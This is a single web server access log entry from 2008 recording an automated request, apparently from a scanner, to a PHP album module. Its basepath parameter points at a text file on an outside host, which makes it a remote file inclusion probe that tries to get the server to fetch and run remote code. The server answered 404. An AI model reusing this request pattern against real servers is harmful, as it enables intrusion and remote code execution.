74.53.197.2 - - [08/Jun/2008:11:29:48 -0700] "GET /logs//modules/4nAlbum/public/displayCategory.php?basepath=http://khenifrati.free.fr//modules/tinycontent/admin/spaw/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
